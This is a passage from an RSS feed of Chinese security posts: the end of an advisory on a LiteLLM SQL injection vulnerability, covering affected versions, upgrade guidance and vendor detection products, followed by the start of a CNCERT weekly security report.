182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的LiteLLM版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1.81.16≤version&lt;1.83.7</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041773" src="https://wechat2rss.xlab.app/img-proxy/?k=5713ab12&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTvoNv1uNXichuibBu1M5xhib3zibIP0rfWHFR3ok2ZnoQTkdLMBDkbMQhfYRGsdXMYMW52RBh9sYoShLDeRpM1Vermiajrxk3gZPjE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将litellm更新到1.83.7及以上版本。</span><span leaf=""><br/></span><span leaf="">下载链接：<a href="https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable" target="_blank">https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041775" src="https://wechat2rss.xlab.app/img-proxy/?k=ec6bb8f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSMglpwIdrjpeW2WtXicJJLrrMIfAK9cZI1Yu4Bg0lGGmfYc9uExfhXgGTHvFichkJibA6vmicHzOaRHl7s8C3vCGeP6eGqgw2JJ5s%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041777" src="https://wechat2rss.xlab.app/img-proxy/?k=471023cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxS3kpgtlvcdGf504xdUmDZ9DYfmOMl1RUx7sticiccsGrZY1qo2gD9xC5ibdparPrv2YXlY5M0NLTHVrTD6XeSqrstIM4ibvqdKSTY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对LiteLLM的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0031936。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0031936。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对LiteLLM SQL注入漏洞(CVE-2026-42208)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">预计2026年05月06日发布检测方案，规则ID:SF-2026-00905。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案，规则ID:SF-2026-01016。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案（需要具备TSS组件能力），规则ID:SF-2026-01016。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月06日发布检测方案（需要具备云镜组件能力），规则ID:SF-2026-00905。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3、漏洞安全监测</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对LiteLLM SQL注入漏洞(CVE-2026-42208)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，</span></span></strong><span leaf="">快速检查受影响范围，相关产品及服务如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年04月30日发布监测方案，规则ID:11220503。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月30日发布监测方案（需要具备SIP组件能力），规则ID:11220503。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月30日发布监测方案，规则ID:11220503。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服流量检测GPT】</span></span></strong><span leaf="">流量检测GPT基于攻击理解、代码理解能力，不依赖规则即可检测该攻击威胁。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4、漏洞安全防护</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对LiteLLM SQL注入漏洞(CVE-2026-42208)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年04月30日发布防护方案，规则ID:11220503。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年04月30日发布防护方案，规则ID:11220503。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月30日发布防护方案（需要具备AF组件能力），规则ID:11220503。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月30日发布防护方案（需要具备AF组件能力），规则ID:11220503。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc" target="_blank">https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/28</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到LiteLLM SQL注入漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/29</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041778" src="https://wechat2rss.xlab.app/img-proxy/?k=7fca0c76&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FAPc6NwjLsxSve8WoL510hdP6aOlknCvIIBjDy36IPbMVNUmwLbrTwtKeNNToxTqKODmzADFUJCw2knKdJia3mDX32y9ezeh3lPOO0DX8vKXM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16318%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=13f77a34&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525429%26idx%3D2%26sn%3D576d9806998fdf7f0dbf7b40e17dcfcb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2026 20:25:00 +0800</pubDate>
    </item>
    <item>
      <title>网络安全信息与动态周报2026年第17期（4月20日-4月26日）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525429&amp;idx=3&amp;sn=81c972bbb2dae75573479374efa28eb1</link>
      <description>分享一篇文章。</description>
      <content:encoded><![CDATA[<p><span>深信服千里目安全技术中心</span> <span>2026-04-29 20:25</span> <span style="display: inline-block;">北京</span></p>


  <p>分享一篇文章。</p>
  <p><strong>国家互联网应急中心CNCERT</strong>: <a href="http://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw%3D%3D&amp;mid=2247501549&amp;idx=1&amp;sn=97ecbb76c2cb79f98d955fbb80b7cdb4&amp;scene=45#wechat_redirect">网络安全信息与动态周报2026年第17期（4月20日-4月26日）</a></p>





  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=99ed1dd3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F1HvTteAHz64B9FXg7TWqjibgFkZTpMg6I2icBfQbxvrJwCxribRnq08fcTYO7C71LnU0fv0KCLz8gswV7SiaL3Qic1g%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本周，互联网网络安全态势整体评价为良。</p>
  <div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: start;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;background-color: rgb(255, 255, 255);visibility: visible;"><div style="margin-top: 10px;margin-bottom: 10px;outline: 0px;visibility: visible;"><div style="outline: 0px;background-image: -webkit-linear-gradient(left, rgb(30, 155, 232), rgb(255, 255, 255));background-color: rgb(30, 155, 232);visibility: visible;"><div style="padding: 10px;outline: 0px;border-width: 0px 0px 0px 10px;border-style: solid;border-left-color: rgb(252, 180, 43);display: inline-block;visibility: visible;"><div style="outline: 0px;color: rgb(255, 255, 255);visibility: visible;"><p style="outline: 0px;font-size: 16px;visibility: visible;"><span style="outline: 0px;font-size: 15px;visibility: visible;"><span leaf="">本周网络安全基本态势</span></span></p></div></div></div></div></div><p style="margin-bottom: 5px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: justify;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-indent: 2em;letter-spacing: 0.54px;visibility: visible;"><span style="outline: 0px;color: rgb(0, 128, 255);font-size: 14px;letter-spacing: 0.54px;text-indent: 2em;visibility: visible;"><span leaf="">本周，互联网网络安全态势整体评价为良。我国互联网基础设施运行整体平稳，全国范围或省级行政区域内未发生造成重大影响的基础设施运行安全事件。针对政府、企业以及广大互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播以及网站攻击。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017900" data-ratio="1.150297619047619" data-s="300,640" type="block" data-type="png" data-w="672" src="https://wechat2rss.xlab.app/img-proxy/?k=2c04826e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FaoXpXT1UJRh7Z26KLCnOtfq6ln7qxLcEhibJCNVWe6apGic6BeY4R6YQFiaAqrKUhySosSpVdficuIt73vOThcxywxLjVKAibZ7iceoK3YUjGQTcA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017894" data-ratio="1.1059701492537313" data-s="300,640" type="block" data-type="png" data-w="670" src="https://wechat2rss.xlab.app/img-proxy/?k=aa2e30a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FaoXpXT1UJRiaUDpS4RPWBqvZxMNbHI4rCd2jjicgEBEhTzyAVCib6osBqzoIwppNvgcquibiapQz5gIMp9t7Y5HJbWW5FdIfMh60gTFXPP9yFFics%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017882" data-ratio="0.6274217585692996" data-s="300,640" type="block" data-type="png" data-w="671" src="https://wechat2rss.xlab.app/img-proxy/?k=b967079d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRiaYuJfhJAAIic2gmU3p12joNUK0GkZfhUozY48L70CH4LA50dywbfQicX8zjXJRyh83sO4xib9j7kdWEslXtlQRzeHgCnluolulLQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017890" data-ratio="0.44296296296296295" data-s="300,640" type="block" data-type="png" data-w="675" src="https://wechat2rss.xlab.app/img-proxy/?k=348686be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRj7EEYzicjZ3K9lwmTFU4MDmmjb8vOqpfxOJgwmTcnSMkuzk9RLywaibfgmowLpHQwrZHVibmqOlZZib5bpwwspwmvpceiawaTfq8C0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017899" data-ratio="1.258160237388724" data-s="300,640" type="block" data-type="png" data-w="674" src="https://wechat2rss.xlab.app/img-proxy/?k=ac9c7c57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRhSJGOsaWiaPEqMicPicePkgqfnxneqm9k32UhR5MsBYRSvTY43R4ew0CiaMl8oktQrwTb48w6PpXkEQg89c2rIugNcDudVicLlLC7c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: start;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;"><div style="margin-top: 10px;margin-bottom: 10px;outline: 0px;"><div style="outline: 0px;background-image: -webkit-linear-gradient(left, rgb(30, 155, 232), rgb(255, 255, 255));background-color: rgb(30, 155, 232);"><div style="padding: 10px;outline: 0px;border-width: 0px 0px 0px 10px;border-style: solid;border-left-color: rgb(252, 180, 43);display: inline-block;"><div style="outline: 0px;color: rgb(255, 255, 255);"><p style="outline: 0px;font-size: 16px;"><span style="outline: 0px;font-size: 15px;"><span leaf="">本周事件处理情况</span></span></p></div></div></div></div></div><p style="margin-bottom: 16px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: justify;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.5em;text-indent: 2em;letter-spacing: 0.54px;"><span style="outline: 0px;color: rgb(0, 128, 255);font-size: 14px;letter-spacing: 0.54px;text-indent: 2em;"><p><span 